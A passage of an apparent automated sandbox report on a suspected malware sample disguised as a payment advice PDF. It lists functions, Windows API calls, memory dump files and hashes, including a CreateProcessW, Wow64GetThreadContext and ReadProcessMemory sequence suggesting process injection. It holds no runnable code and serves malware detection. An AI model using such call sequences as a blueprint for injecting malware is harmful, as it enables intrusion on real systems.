                                                                • Part of subcall function 00860162: MapVirtualKeyW.USER32(00000011,00000000), ref: 008601B9
                                                                • Part of subcall function 00860162: MapVirtualKeyW.USER32(00000012,00000000), ref: 008601C1
                                                                • Part of subcall function 008560F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0084F930), ref: 00856154
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0084F9CD
                                                              • OleInitialize.OLE32(00000000), ref: 0084FA4A
                                                              • CloseHandle.KERNEL32(00000000), ref: 008845C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID:
                                                              • API String ID: 1986988660-0
                                                              • Opcode ID: ce2c0b4545df8c927187212d6763569e360be7df5fb837ece02b5d23ba5868e4
                                                              • Instruction ID: a2c357a923c6462cda1491e1c39c78780be3fa14978c381956fe41745165607d
                                                              • Opcode Fuzzy Hash: ce2c0b4545df8c927187212d6763569e360be7df5fb837ece02b5d23ba5868e4
                                                              • Instruction Fuzzy Hash: C781C3B0929B44CFC794DF39AC4869B7BEAFB58306752812AD109C7372E7704884EF11
                                                              Function 0084434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00844370
                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00844415
                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00844432
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_$_memset
                                                              • String ID:
                                                              • API String ID: 1505330794-0
                                                              • Opcode ID: 66003e2942c384f3ecb9d90b2483318e1dab49653c53da93051c3c0a0ca8773f
                                                              • Instruction ID: bf490316bc73e35858d2342500cd2c9c8deed37086e216a873be2779f70565b1
                                                              • Opcode Fuzzy Hash: 66003e2942c384f3ecb9d90b2483318e1dab49653c53da93051c3c0a0ca8773f
                                                              • Instruction Fuzzy Hash: 593173715057058FD721DF28D884B9BBBF8FF58708F00092EE69AD3251E771A944CB96
                                                              Function 0086571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __FF_MSGBANNER.LIBCMT ref: 00865733
                                                                • Part of subcall function 0086A16B: __NMSG_WRITE.LIBCMT ref: 0086A192
                                                                • Part of subcall function 0086A16B: __NMSG_WRITE.LIBCMT ref: 0086A19C
                                                              • __NMSG_WRITE.LIBCMT ref: 0086573A
                                                                • Part of subcall function 0086A1C8: GetModuleFileNameW.KERNEL32(00000000,009033BA,00000104,?,00000001,00000000), ref: 0086A25A
                                                                • Part of subcall function 0086A1C8: ___crtMessageBoxW.LIBCMT ref: 0086A308
                                                                • Part of subcall function 0086309F: ___crtCorExitProcess.LIBCMT ref: 008630A5
                                                                • Part of subcall function 0086309F: ExitProcess.KERNEL32 ref: 008630AE
                                                                • Part of subcall function 00868B28: __getptd_noexit.LIBCMT ref: 00868B28
                                                              • RtlAllocateHeap.NTDLL(01610000,00000000,00000001,00000000,?,?,?,00860DD3,?), ref: 0086575F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 1372826849-0
                                                              • Opcode ID: fd87d49813f0b908169f64f58c6c9167ade2b9adf374d6b7e57cea7c408da5a9
                                                              • Instruction ID: e25956628c781caa4718d71069430158315b0632e75ee6e6512ed744a41fd6da
                                                              • Opcode Fuzzy Hash: fd87d49813f0b908169f64f58c6c9167ade2b9adf374d6b7e57cea7c408da5a9
                                                              • Instruction Fuzzy Hash: 3E01B135244B05EEE615373DEC92A2E739CFB82765F530536F519EA2C2DE709C005762
                                                              Function 008A98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,008A9548,?,?,?,?,?,00000004), ref: 008A98BB
                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008A9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008A98D1
                                                              • CloseHandle.KERNEL32(00000000,?,008A9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008A98D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 637b35b1410be9fec774b108022cb1567e6ce3d38f3f8cb24135938f53f20e61
                                                              • Instruction ID: 4702eccdf5ab5079b56acec78f896d7b8726f449b9862dc86cbfd5e65927b812
                                                              • Opcode Fuzzy Hash: 637b35b1410be9fec774b108022cb1567e6ce3d38f3f8cb24135938f53f20e61
                                                              • Instruction Fuzzy Hash: 46E08632141214B7F7221B64EC09FCA7B2AFB06760F144121FB54A90E187B115119798
                                                              Function 0084A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CALL
                                                              • API String ID: 0-4196123274
                                                              • Opcode ID: 56179666261b6362c35437200ce24466fbf502d8af33ef65efbd14362198d8c0
                                                              • Instruction ID: e65a074964c33e106fbaaa207e9b86c4ce366255fabe74ee630f5022616cb32b
                                                              • Opcode Fuzzy Hash: 56179666261b6362c35437200ce24466fbf502d8af33ef65efbd14362198d8c0
                                                              • Instruction Fuzzy Hash: 9B224670548209DFDB28DF18C490A2ABBE1FF84314F15896DE89ADB262D735EC45CB82
                                                              Function 00844C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: EA06
                                                              • API String ID: 4104443479-3962188686
                                                              • Opcode ID: 79e7ca0da52c343bebe4327b4528c2defb0eb297d2668e2091ebfe515cd80c0c
                                                              • Instruction ID: 9a2d7a6e4a000803421ab5e5858b4a521d0cccf8731275a4fc8fc5b99537ea21
                                                              • Opcode Fuzzy Hash: 79e7ca0da52c343bebe4327b4528c2defb0eb297d2668e2091ebfe515cd80c0c
                                                              • Instruction Fuzzy Hash: 8B416B21E0425C6BDF219B6888917BE7FB2FF45304F286475FC86DB286D6349D4483A3
                                                              Function 00847A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                                              • Instruction ID: 0caa243640cfb5b454e8f568b732e80434d93c04a1cb4a9169b9391906c4c8e6
                                                              • Opcode Fuzzy Hash: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                                              • Instruction Fuzzy Hash: 4031C5B160461AAFC704DF68C8D1E6DF3A9FF483247158629E519CB391EB30ED20CB90
                                                              Function 008447D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsThemeActive.UXTHEME ref: 00844834
                                                                • Part of subcall function 0086336C: __lock.LIBCMT ref: 00863372
                                                                • Part of subcall function 0086336C: DecodePointer.KERNEL32(00000001,?,00844849,00897C74), ref: 0086337E
                                                                • Part of subcall function 0086336C: EncodePointer.KERNEL32(?,?,00844849,00897C74), ref: 00863389
                                                                • Part of subcall function 008448FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00844915
                                                                • Part of subcall function 008448FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0084492A
                                                                • Part of subcall function 00843B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00843B68
                                                                • Part of subcall function 00843B3A: IsDebuggerPresent.KERNEL32 ref: 00843B7A
                                                                • Part of subcall function 00843B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,009052F8,009052E0,?,?), ref: 00843BEB
                                                                • Part of subcall function 00843B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00843C6F
                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00844874
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                              • String ID:
                                                              • API String ID: 1438897964-0
                                                              • Opcode ID: b88a2abc1456f19a6cec4fe62678e063f1d19fd1329728bb48c988758aacee5c
                                                              • Instruction ID: cb1adeb94debf2af9e159cbb5b1f80aead39a0ba0a2fb39cef4b7279690e0c0a
                                                              • Opcode Fuzzy Hash: b88a2abc1456f19a6cec4fe62678e063f1d19fd1329728bb48c988758aacee5c
                                                              • Instruction Fuzzy Hash: 0C116A719183499FD700EF2CE84590ABBE8FF85750F11452AF090C32B1DB709A44CB92
                                                              Function 00860DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0086571C: __FF_MSGBANNER.LIBCMT ref: 00865733
                                                                • Part of subcall function 0086571C: __NMSG_WRITE.LIBCMT ref: 0086573A
                                                                • Part of subcall function 0086571C: RtlAllocateHeap.NTDLL(01610000,00000000,00000001,00000000,?,?,?,00860DD3,?), ref: 0086575F
                                                              • std::exception::exception.LIBCMT ref: 00860DEC
                                                              • __CxxThrowException@8.LIBCMT ref: 00860E01
                                                                • Part of subcall function 0086859B: RaiseException.KERNEL32(?,?,?,008F9E78,00000000,?,?,?,?,00860E06,?,008F9E78,?,00000001), ref: 008685F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3902256705-0
                                                              • Opcode ID: 3dfd91c47e6631e754ccf186db13e24f2619d5e0e0592af0980c74f13e768d53
                                                              • Instruction ID: 4c0076de8b2a732a44e3aa22d115ee4491dde670ca216d4f47c0bb8ce6981355
                                                              • Opcode Fuzzy Hash: 3dfd91c47e6631e754ccf186db13e24f2619d5e0e0592af0980c74f13e768d53
                                                              • Instruction Fuzzy Hash: FAF0A43550021DA6CB10BAE8EC06ADF7BADFF11351F110666F918E6281DFB19A448ADA
                                                              Function 008653A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00868B28: __getptd_noexit.LIBCMT ref: 00868B28
                                                              • __lock_file.LIBCMT ref: 008653EB
                                                                • Part of subcall function 00866C11: __lock.LIBCMT ref: 00866C34
                                                              • __fclose_nolock.LIBCMT ref: 008653F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                              • String ID:
                                                              • API String ID: 2800547568-0
                                                              • Opcode ID: 4aa586414f18bd1c14eac8ca5f5e3accad81a78e0c904a4018e398f05063a803
                                                              • Instruction ID: 268d763ba8189e4de914a211bd55c4be475c8e3ca8134204bd042c71bba7c4ff
                                                              • Opcode Fuzzy Hash: 4aa586414f18bd1c14eac8ca5f5e3accad81a78e0c904a4018e398f05063a803
                                                              • Instruction Fuzzy Hash: DBF09671800A04DADB106F7D99027AD7AA0FF42774F238309A428EB3C1CFBC49419B53
                                                              Function 016541FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 016549BB
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01654A51
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01654A73
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                              • Instruction ID: 24a0f44e3d3723d554813dbb396a112c1cf3f69f601a9450ca166b4f332bb437
                                                              • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                              • Instruction Fuzzy Hash: 8B12CE24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A
                                                              Function 00860C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction ID: d15cde7a64f4e2241bbdfa984dbfde16299e49d15483f666ad18fee52d20ac20
                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction Fuzzy Hash: 7231C274A001099FC718DF58D484A6AF7A6FB59300B6686A5E80ACB351D731EED1DF88
                                                              Function 0087FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: fd882b1e65f6713a24013e3a341de4f3d47a51411dc06e4a8a13e6556faf048d
                                                              • Instruction ID: 18eff8eb4ea11a016a413b20daf6c89a14a2f5209c4f0586832a307d02e8f088
                                                              • Opcode Fuzzy Hash: fd882b1e65f6713a24013e3a341de4f3d47a51411dc06e4a8a13e6556faf048d
                                                              • Instruction Fuzzy Hash: AE41E5746043559FDB24DF18C484B1ABBE1FF45318F0988ACE9998B762C736E849CF52
                                                              Function 00847B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: c0ccecf476ceb9961106da21545d7866d10ce6803856f00ded131fdc8c210ded
                                                              • Instruction ID: 9a0ff5fadeb594d59bbfb64eb610b915bc67b849b80a826e3d2dff2200547957
                                                              • Opcode Fuzzy Hash: c0ccecf476ceb9961106da21545d7866d10ce6803856f00ded131fdc8c210ded
                                                              • Instruction Fuzzy Hash: B3210872614A0DEBDB148F25E841B7A7BB4FB58354F21C56DE489C5194EB30C1D0D745
                                                              Function 00844DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00844BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00844BEF
                                                                • Part of subcall function 0086525B: __wfsopen.LIBCMT ref: 00865266
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00844E0F
                                                                • Part of subcall function 00844B6A: FreeLibrary.KERNEL32(00000000), ref: 00844BA4
                                                                • Part of subcall function 00844C70: _memmove.LIBCMT ref: 00844CBA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                              • String ID:
                                                              • API String ID: 1396898556-0
                                                              • Opcode ID: 85707e9cd690d6049f92edce60849ec3d3d897bc8a9de7c8616de3db0fcd0a77
                                                              • Instruction ID: eb5d529f24b3b84e8ebfaac8ae998bca8736b665aa3d1d51013457f261e9504c
                                                              • Opcode Fuzzy Hash: 85707e9cd690d6049f92edce60849ec3d3d897bc8a9de7c8616de3db0fcd0a77
                                                              • Instruction Fuzzy Hash: 0711A33160030DABDF15AFB8C816FAD77A9FF44720F108829F541E7182EA759A159B52
                                                              Function 0087FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: b186875cd1c21804757332b43943c73a55150b3c4ef5f0623ffa4bd79796fefe
                                                              • Instruction ID: c5c1a80b33f20d0d57ba577b80da9fe6071378df371821e0ecb9df9df8db2d31
                                                              • Opcode Fuzzy Hash: b186875cd1c21804757332b43943c73a55150b3c4ef5f0623ffa4bd79796fefe
                                                              • Instruction Fuzzy Hash: CD21F374A08305DFDB14DF64C444A1ABBE1FF84314F058968F9899B762D731E809CB92
                                                              Function 0086072A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008607B0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
